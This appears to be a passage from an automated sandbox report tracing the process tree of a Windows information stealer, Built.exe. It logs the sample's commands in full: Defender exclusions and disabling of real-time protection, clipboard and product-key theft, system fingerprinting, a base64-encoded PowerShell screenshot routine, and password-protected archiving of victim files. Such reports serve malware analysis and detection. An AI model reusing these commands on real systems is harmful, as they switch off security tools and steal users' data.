bwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ts1rjisr\ts1rjisr.cmdline"5⤵PID:3592
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES342.tmp" "c:\Users\Admin\AppData\Local\Temp\ts1rjisr\CSCDD06632E3AEB421AAF274267F33C840.TMP"6⤵PID:2532
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3488
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4496
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2296
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2424
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4024
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3692
-
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3612
-
C:\Windows\system32\getmac.exegetmac4⤵PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI6642\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\Y60k0.zip" *"3⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\_MEI6642\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI6642\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\Y60k0.zip" *4⤵
- Executes dropped EXE
PID:1372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:4396
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:2488
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:4200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4804
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:4408
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2396
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Executes dropped EXE
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1548 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵PID:4920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:1344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵PID:3400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4804
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1852
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:3180
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:3296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4940
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3276
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3500
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2620
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1532 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\euokisbq\euokisbq.cmdline"5⤵PID:3992
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FB5.tmp" "c:\Users\Admin\AppData\Local\Temp\euokisbq\CSC964E35B9A1534A559C720D546ED99DC.TMP"6⤵PID:4824
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2252
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4156
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4388
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3940
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3544
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2672
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI13322\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\I9WoN.zip" *"3⤵PID:1620
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI13322\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI13322\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\I9WoN.zip" *4⤵
- Executes dropped EXE
PID:1204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:1128
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:3716
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:652
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:1576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:3600
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4704
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3456
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3108
-
-
-
Network
